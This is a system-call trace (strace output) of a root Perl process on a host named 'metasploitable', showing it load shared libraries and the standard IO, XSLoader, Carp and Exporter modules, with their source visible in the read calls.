9861  20:00:49.831316 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de7000
9861  20:00:49.831343 mmap2(0xb7f30000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f30000
9861  20:00:49.831358 mmap2(0xb7f33000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f33000
9861  20:00:49.831385 close(1)          = 0
9861  20:00:49.831397 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9861  20:00:49.831410 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1
9861  20:00:49.831424 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512
9861  20:00:49.831515 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0
9861  20:00:49.831532 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db5000
9861  20:00:49.831543 mmap2(0xb7dbe000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dbe000
9861  20:00:49.831557 mmap2(0xb7dc0000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dc0000
9861  20:00:49.831571 close(1)          = 0
9861  20:00:49.831594 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db4000
9861  20:00:49.831609 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db48c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
9861  20:00:49.831669 mprotect(0xb7f30000, 4096, PROT_READ) = 0
9861  20:00:49.831696 munmap(0xb7f78000, 29913) = 0
9861  20:00:49.831709 set_tid_address(0xb7db4908) = 9861
9861  20:00:49.831718 set_robust_list(0xb7db4910, 0xc) = 0
9861  20:00:49.831728 futex(0xbfca7140, 0x81 /* FUTEX_??? */, 1) = 0
9861  20:00:49.831804 rt_sigaction(SIGRTMIN, {0xb7f3a2c0, [], SA_SIGINFO}, NULL, 8) = 0
9861  20:00:49.831835 rt_sigaction(SIGRT_1, {0xb7f3a340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0
9861  20:00:49.831848 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
9861  20:00:49.831862 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
9861  20:00:49.831895 uname({sys="Linux", node="metasploitable", ...}) = 0
9861  20:00:49.831941 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0
9861  20:00:49.831987 brk(0)            = 0x8153000
9861  20:00:49.831996 brk(0x8174000)    = 0x8174000
9861  20:00:49.832040 getuid32()        = 0
9861  20:00:49.832050 geteuid32()       = 0
9861  20:00:49.832059 getgid32()        = 0
9861  20:00:49.832068 getegid32()       = 0
9861  20:00:49.832104 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d93000
9861  20:00:49.832131 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1
9861  20:00:49.832148 read(1, "\332;\227\27", 4) = 4
9861  20:00:49.832165 close(1)          = 0
9861  20:00:49.832183 time(NULL)        = 1495670449
9861  20:00:49.832243 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfca6e10) = -1 ENOENT (No such file or directory)
9861  20:00:49.832291 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfca6e10) = -1 ENOENT (No such file or directory)
9861  20:00:49.832335 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfca6e10) = -1 ENOENT (No such file or directory)
9861  20:00:49.832367 stat64("/usr/local/lib/perl/5.8.7", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832379 stat64("/usr/local/share/perl/5.8.7", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832392 stat64("/usr/local/lib/perl/5.8.6", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832403 stat64("/usr/local/share/perl/5.8.6", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832415 stat64("/usr/local/lib/perl/5.8.4", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832426 stat64("/usr/local/share/perl/5.8.4", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832438 stat64("/usr/local/lib/perl/5.8.3", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832449 stat64("/usr/local/share/perl/5.8.3", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832461 stat64("/usr/local/lib/perl/5.8.2", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832472 stat64("/usr/local/share/perl/5.8.2", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832484 stat64("/usr/local/lib/perl/5.8.1", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832496 stat64("/usr/local/share/perl/5.8.1", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832512 stat64("/usr/local/lib/perl/5.8.0", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832524 stat64("/usr/local/share/perl/5.8.0", 0xbfca6f50) = -1 ENOENT (No such file or directory)
9861  20:00:49.832546 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6c48) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.832581 _llseek(0, 0, [0], SEEK_CUR) = 0
9861  20:00:49.832594 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6c48) = -1 EBADF (Bad file descriptor)
9861  20:00:49.832626 _llseek(1, 0, 0xbfca6c90, SEEK_CUR) = -1 EBADF (Bad file descriptor)
9861  20:00:49.832654 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6c48) = -1 EINVAL (Invalid argument)
9861  20:00:49.832666 _llseek(2, 0, 0xbfca6c90, SEEK_CUR) = -1 ESPIPE (Illegal seek)
9861  20:00:49.832677 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1
9861  20:00:49.832741 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6d08) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.832772 _llseek(1, 0, [0], SEEK_CUR) = 0
9861  20:00:49.832797 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0
9861  20:00:49.832810 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0
9861  20:00:49.832845 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0
9861  20:00:49.832901 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13
9861  20:00:49.832947 getppid()         = 9859
9861  20:00:49.833006 stat64("/etc/perl/IO.pmc", 0xbfca69fc) = -1 ENOENT (No such file or directory)
9861  20:00:49.833020 stat64("/etc/perl/IO.pm", 0xbfca690c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833033 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfca69fc) = -1 ENOENT (No such file or directory)
9861  20:00:49.833046 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfca690c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833059 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfca69fc) = -1 ENOENT (No such file or directory)
9861  20:00:49.833071 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfca690c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833085 stat64("/usr/lib/perl5/IO.pmc", 0xbfca69fc) = -1 ENOENT (No such file or directory)
9861  20:00:49.833096 stat64("/usr/lib/perl5/IO.pm", 0xbfca690c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833109 stat64("/usr/share/perl5/IO.pmc", 0xbfca69fc) = -1 ENOENT (No such file or directory)
9861  20:00:49.833121 stat64("/usr/share/perl5/IO.pm", 0xbfca690c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833133 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfca69fc) = -1 ENOENT (No such file or directory)
9861  20:00:49.833146 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0
9861  20:00:49.833166 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6
9861  20:00:49.833180 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6718) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.833191 _llseek(6, 0, [0], SEEK_CUR) = 0
9861  20:00:49.833213 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413
9861  20:00:49.833346 stat64("/etc/perl/XSLoader.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833360 stat64("/etc/perl/XSLoader.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833374 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833387 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833414 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833427 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833445 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833457 stat64("/usr/lib/perl5/XSLoader.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833470 stat64("/usr/share/perl5/XSLoader.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833482 stat64("/usr/share/perl5/XSLoader.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833495 stat64("/usr/lib/perl/5.8/XSLoader.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.833508 stat64("/usr/lib/perl/5.8/XSLoader.pm", {st_mode=S_IFREG|0644, st_size=3408, ...}) = 0
9861  20:00:49.833528 open("/usr/lib/perl/5.8/XSLoader.pm", O_RDONLY|O_LARGEFILE) = 8
9861  20:00:49.833542 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6268) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.833553 _llseek(8, 0, [0], SEEK_CUR) = 0
9861  20:00:49.833572 read(8, "# Generated from XSLoader.pm.PL (resolved %Config::Config value)\n\npackage XSLoader;\n\n$VERSION = \"0.06\";\n\n#use strict;\n\n# enable debug/trace messages from DynaLoader perl code\n# $dl_debug = $ENV{PERL_DL_DEBUG} || 0 unless defined $dl_debug;\n\n  my $dl_dlext = \'so\';\n\npackage DynaLoader;\n\n# No prizes for guessing why we don\'t say \'bootstrap DynaLoader;\' here.\n# NOTE: All dl_*.xs (including dl_none.xs) define a dl_error() XSUB\nboot_DynaLoader(\'DynaLoader\') if defined(&boot_DynaLoader) &&\n                                !defined(&dl_error);\npackage XSLoader;\n\nsub load {\n    package DynaLoader;\n\n    die q{XSLoader::load(\'Your::Module\', $Your::Module::VERSION)} unless @_;\n\n    my($module) = $_[0];\n\n    # work with static linking too\n    my $b = \"$module\\::bootstrap\";\n    goto &$b if defined &$b;\n\n    goto retry unless $module and defined &dl_load_file;\n\n    my @modparts = split(/::/,$module);\n    my $modfname = $modparts[-1];\n\n    my $modpname = join(\'/\',@modparts);\n    my $modlibname = (caller())[1];\n    my $c = @modparts;\n    $modlibname =~ s,[\\\\/][^\\\\/]+$,, while $c--;\t# Q&D basename\n    my $file = \"$modlibname/auto/$modpname/$modfname.$dl_dlext\";\n\n#   print STDERR \"XSLoader::load for $module ($file)\\n\" if $dl_debug;\n\n    my $bs = $file;\n    $bs =~ s/(\\.\\w+)?(;\\d*)?$/\\.bs/; # look for .bs \'beside\' the library\n\n    goto retry if not -f $file or -s $bs;\n\n    my $bootname = \"boot_$module\";\n    $bootname =~ s/\\W/_/g;\n    @DynaLoader::dl_require_symbols = ($bootname);\n\n    my $boot_symbol_ref;\n\n    if ($^O eq \'darwin\') {\n        if ($boot_symbol_ref = dl_find_symbol(0, $bootname)) {\n            goto boot; #extension library has already been loaded, e.g. darwin\n        }\n    }\n\n    # Many dynamic extension loading problems will appear to come from\n    # this section of code: XYZ failed at line 123 of DynaLoader.pm.\n    # Often these errors are actually occurring in the initialisation\n    # C code of the extension XS file. Perl reports the error as being\n    # in this perl code simply because this was the last perl code\n    # it executed.\n\n    my $libref = dl_load_file($file, 0) or do { \n        require Carp;\n        Carp::croak(\"Can\'t load \'$file\' for module $module: \" . dl_error());\n    };\n    push(@DynaLoader::dl_librefs,$libref);  # record loaded object\n\n    my @unresolved = dl_undef_symbols();\n    if (@unresolved) {\n        require Carp;\n        Carp::carp(\"Undefined symbols present after loading $file: @unresolved\\n\");\n    }\n\n    $boot_symbol_ref = dl_find_symbol($libref, $bootname) or do {\n        require Carp;\n        Carp::croak(\"Can\'t find \'$bootname\' symbol in $file\\n\");\n    };\n\n    push(@DynaLoader::dl_modules, $module); # record loaded module\n\n  boot:\n    my $xs = dl_install_xsub(\"${module}::bootstrap\", $boot_symbol_ref, $file);\n\n    # See comment block above\n    return &$xs(@_);\n\n  retry:\n    my $bootstrap_inherit = DynaLoader->can(\'bootstrap_inherit\') || \n                            XSLoader->can(\'bootstrap_inherit\');\n    goto &$bootstrap_inherit;\n}\n\n# Versions of DynaLoader prior to 5.6.0 don\'t have this function.\nsub bootstrap_inherit {\n    package DynaLoader;\n\n    my $module = $_[0];\n    local *DynaLoader::isa = *{\"$module\\::ISA\"};\n    local @DynaLoader::isa = (@DynaLoader::isa, \'DynaLoader\');\n    # Cannot goto due to delocalization.  Will report errors on a wrong line?\n    require DynaLoader;\n    DynaLoader::bootstrap(@_);\n}\n\n1;\n\n__END__\n\n", 4096) = 3408
9861  20:00:49.833892 brk(0x8195000)    = 0x8195000
9861  20:00:49.834188 _llseek(8, 3407, [3407], SEEK_SET) = 0
9861  20:00:49.834204 _llseek(8, 0, [3407], SEEK_CUR) = 0
9861  20:00:49.834234 close(8)          = 0
9861  20:00:49.834354 stat64("/etc/perl/Carp.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834370 stat64("/etc/perl/Carp.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834384 stat64("/usr/local/lib/perl/5.8.8/Carp.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834396 stat64("/usr/local/lib/perl/5.8.8/Carp.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834410 stat64("/usr/local/share/perl/5.8.8/Carp.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834423 stat64("/usr/local/share/perl/5.8.8/Carp.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834436 stat64("/usr/lib/perl5/Carp.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834448 stat64("/usr/lib/perl5/Carp.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834461 stat64("/usr/share/perl5/Carp.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834473 stat64("/usr/share/perl5/Carp.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834486 stat64("/usr/lib/perl/5.8/Carp.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834499 stat64("/usr/lib/perl/5.8/Carp.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834512 stat64("/usr/share/perl/5.8/Carp.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.834525 stat64("/usr/share/perl/5.8/Carp.pm", {st_mode=S_IFREG|0644, st_size=4112, ...}) = 0
9861  20:00:49.834546 open("/usr/share/perl/5.8/Carp.pm", O_RDONLY|O_LARGEFILE) = 8
9861  20:00:49.834560 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6268) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.834572 _llseek(8, 0, [0], SEEK_CUR) = 0
9861  20:00:49.834589 read(8, "package Carp;\n\nour $VERSION = \'1.04\';\n\n# This package is heavily used. Be small. Be fast. Be good.\n\n# Comments added by Andy Wardley <abw@kfs.org> 09-Apr-98, based on an\n# _almost_ complete understanding of the package.  Corrections and\n# comments are welcome.\n\n# The members of %Internal are packages that are internal to perl.\n# Carp will not report errors from within these packages if it\n# can.  The members of %CarpInternal are internal to Perl\'s warning\n# system.  Carp will not report errors from within these packages\n# either, and will not report calls *to* these packages for carp and\n# croak.  They replace $CarpLevel, which is deprecated.    The\n# $Max(EvalLen|(Arg(Len|Nums)) variables are used to specify how the eval\n# text and function arguments should be formatted when printed.\n\n# Comments added by Jos I. Boumans <kane@dwim.org> 11-Aug-2004\n# I can not get %CarpInternal or %Internal to work as advertised,\n# therefor leaving it out of the below documentation.\n# $CarpLevel may be decprecated according to the last comment, but\n# after 6 years, it\'s still around and in heavy use ;)\n\n$CarpInternal{Carp}++;\n$CarpInternal{warnings}++;\n$CarpLevel = 0;     # How many extra package levels to skip on carp.\n                    # How many calls to skip on confess.\n                    # Reconciling these notions is hard, use\n                    # %Internal and %CarpInternal instead.\n$MaxEvalLen = 0;    # How much eval \'...text...\' to show. 0 = all.\n$MaxArgLen = 64;    # How much of each argument to print. 0 = all.\n$MaxArgNums = 8;    # How many arguments to print. 0 = all.\n$Verbose = 0;       # If true then make shortmess call longmess instead\n\nrequire Exporter;\n@ISA = (\'Exporter\');\n@EXPORT = qw(confess croak carp);\n@EXPORT_OK = qw(cluck verbose longmess shortmess);\n@EXPORT_FAIL = qw(verbose);\t# hook to enable verbose mode\n\n# if the caller specifies verbose usage (\"perl -MCarp=verbose script.pl\")\n# then the following method will be called by the Exporter which knows\n# to do this thanks to @EXPORT_FAIL, above.  $_[1] will contain the word\n# \'verbose\'.\n\nsub export_fail {\n    shift;\n    $Verbose = shift if $_[0] eq \'verbose\';\n    return @_;\n}\n\n# longmess() crawls all the way up the stack reporting on all the function\n# calls made.  The error string, $error, is originally constructed from the\n# arguments passed into longmess() via confess(), cluck() or shortmess().\n# This gets appended with the stack trace messages which are generated for\n# each function call on the stack.\n\nsub longmess {\n    {\n\tlocal($@, $!);\n\t# XXX fix require to not clear $@ or $!?\n\t# don\'t use require unless we need to (for Safe compartments)\n\trequire Carp::Heavy unless $INC{\"Carp/Heavy.pm\"};\n    }\n    # Icky backwards compatibility wrapper. :-(\n    my $call_pack = caller();\n    if ($Internal{$call_pack} or $CarpInternal{$call_pack}) {\n      return longmess_heavy(@_);\n    }\n    else {\n      local $CarpLevel = $CarpLevel + 1;\n      return longmess_heavy(@_);\n    }\n}\n\n# shortmess() is called by carp() and croak() to skip all the way up to\n# the top-level caller\'s package and report the error from there.  confess()\n# and cluck() generate a full stack trace so they call longmess() to\n# generate that.  In verbose mode shortmess() calls longmess() so\n# you always get a stack trace\n\nsub shortmess {\t# Short-circuit &longmess if called via multiple packages\n    {\n\tlocal($@, $!);\n\t# XXX fix require to not clear $@ or $!?\n\t# don\'t use require unless we need to (for Safe compartments)\n\trequire Carp::Heavy unless $INC{\"Carp/Heavy.pm\"};\n    }\n    # Icky backwards compatibility wrapper. :-(\n    my $call_pack = caller();\n    local @CARP_NOT = caller();\n    shortmess_heavy(@_);\n}\n\n# the following four functions call longmess() or shortmess() depending on\n# whether they should generate a full stack trace (confess() and cluck())\n# or simply report the caller\'s package (croak() and carp()), respectively.\n# confess() and croak() die, carp() and cluck() warn.\n\nsub croak   { die  shortmess @_ }\nsub confess { die  longmess  @_ }\nsub carp    { warn shortmess @_ }\nsub cluck   { warn lon", 4096) = 4096
9861  20:00:49.835105 read(8, "gmess  @_ }\n\n1;\n", 4096) = 16
9861  20:00:49.835132 read(8, "", 4096) = 0
9861  20:00:49.835144 close(8)          = 0
9861  20:00:49.835165 stat64("/etc/perl/Exporter.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835179 stat64("/etc/perl/Exporter.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835193 stat64("/usr/local/lib/perl/5.8.8/Exporter.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835205 stat64("/usr/local/lib/perl/5.8.8/Exporter.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835269 stat64("/usr/local/share/perl/5.8.8/Exporter.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835300 stat64("/usr/local/share/perl/5.8.8/Exporter.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835329 stat64("/usr/lib/perl5/Exporter.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835342 stat64("/usr/lib/perl5/Exporter.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835355 stat64("/usr/share/perl5/Exporter.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835368 stat64("/usr/share/perl5/Exporter.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835382 stat64("/usr/lib/perl/5.8/Exporter.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835399 stat64("/usr/lib/perl/5.8/Exporter.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835413 stat64("/usr/share/perl/5.8/Exporter.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.835440 stat64("/usr/share/perl/5.8/Exporter.pm", {st_mode=S_IFREG|0644, st_size=2218, ...}) = 0
9861  20:00:49.835461 open("/usr/share/perl/5.8/Exporter.pm", O_RDONLY|O_LARGEFILE) = 8
9861  20:00:49.835476 ioctl(8, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfca6268) = -1 ENOTTY (Inappropriate ioctl for device)
9861  20:00:49.835488 _llseek(8, 0, [0], SEEK_CUR) = 0
9861  20:00:49.835505 read(8, "package Exporter;\n\nrequire 5.006;\n\n# Be lean.\n#use strict;\n#no strict \'refs\';\n\nour $Debug = 0;\nour $ExportLevel = 0;\nour $Verbose ||= 0;\nour $VERSION = \'5.58\';\nour (%Cache);\n$Carp::Internal{Exporter} = 1;\n\nsub as_heavy {\n  require Exporter::Heavy;\n  # Unfortunately, this does not work if the caller is aliased as *name = \\&foo\n  # Thus the need to create a lot of identical subroutines\n  my $c = (caller(1))[3];\n  $c =~ s/.*:://;\n  \\&{\"Exporter::Heavy::heavy_$c\"};\n}\n\nsub export {\n  goto &{as_heavy()};\n}\n\nsub import {\n  my $pkg = shift;\n  my $callpkg = caller($ExportLevel);\n\n  if ($pkg eq \"Exporter\" and @_ and $_[0] eq \"import\") {\n    *{$callpkg.\"::import\"} = \\&import;\n    return;\n  }\n\n  # We *need* to treat @{\"$pkg\\::EXPORT_FAIL\"} since Carp uses it :-(\n  my($exports, $fail) = (\\@{\"$pkg\\::EXPORT\"}, \\@{\"$pkg\\::EXPORT_FAIL\"});\n  return export $pkg, $callpkg, @_\n    if $Verbose or $Debug or @$fail > 1;\n  my $export_cache = ($Cache{$pkg} ||= {});\n  my $args = @_ or @_ = @$exports;\n\n  local $_;\n  if ($args and not %$export_cache) {\n    s/^&//, $export_cache->{$_} = 1\n      foreach (@$exports, @{\"$pkg\\::EXPORT_OK\"});\n  }\n  my $heavy;\n  # Try very hard not to use {} and hence have to  enter scope on the foreach\n  # We bomb out of the loop with last as soon as heavy is set.\n  if ($args or $fail) {\n    ($heavy = (/\\W/ or $args and not exists $export_cache->{$_}\n               or @$fail and $_ eq $fail->[0])) and last\n                 foreach (@_);\n  } else {\n    ($heavy = /\\W/) and last\n      foreach (@_);\n  }\n  return export $pkg, $callpkg, ($args ? @_ : ()) if $heavy;\n  local $SIG{__WARN__} = \n\tsub {require Carp; &Carp::carp};\n  # shortcut for the common case of no type character\n  *{\"$callpkg\\::$_\"} = \\&{\"$pkg\\::$_\"} foreach @_;\n}\n\n# Default methods\n\nsub export_fail {\n    my $self = shift;\n    @_;\n}\n\n# Unfortunately, caller(1)[3] \"does not work\" if the caller is aliased as\n# *name = \\&foo.  Thus the need to create a lot of identical subroutines\n# Otherwise we could have aliased them to export().\n\nsub export_to_level {\n  goto &{as_heavy()};\n}\n\nsub export_tags {\n  goto &{as_heavy()};\n}\n\nsub export_ok_tags {\n  goto &{as_heavy()};\n}\n\nsub require_version {\n  goto &{as_heavy()};\n}\n\n1;\n__END__\n\n", 4096) = 2218
9861  20:00:49.835981 _llseek(8, 2217, [2217], SEEK_SET) = 0
9861  20:00:49.835999 _llseek(8, 0, [2217], SEEK_CUR) = 0
9861  20:00:49.836009 close(8)          = 0
9861  20:00:49.836174 stat64("/etc/perl/strict.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836192 stat64("/etc/perl/strict.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836225 stat64("/usr/local/lib/perl/5.8.8/strict.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836302 stat64("/usr/local/lib/perl/5.8.8/strict.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836331 stat64("/usr/local/share/perl/5.8.8/strict.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836344 stat64("/usr/local/share/perl/5.8.8/strict.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836358 stat64("/usr/lib/perl5/strict.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836370 stat64("/usr/lib/perl5/strict.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836388 stat64("/usr/share/perl5/strict.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836400 stat64("/usr/share/perl5/strict.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836414 stat64("/usr/lib/perl/5.8/strict.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836440 stat64("/usr/lib/perl/5.8/strict.pm", 0xbfca645c) = -1 ENOENT (No such file or directory)
9861  20:00:49.836454 stat64("/usr/share/perl/5.8/strict.pmc", 0xbfca654c) = -1 ENOENT (No such file or directory)
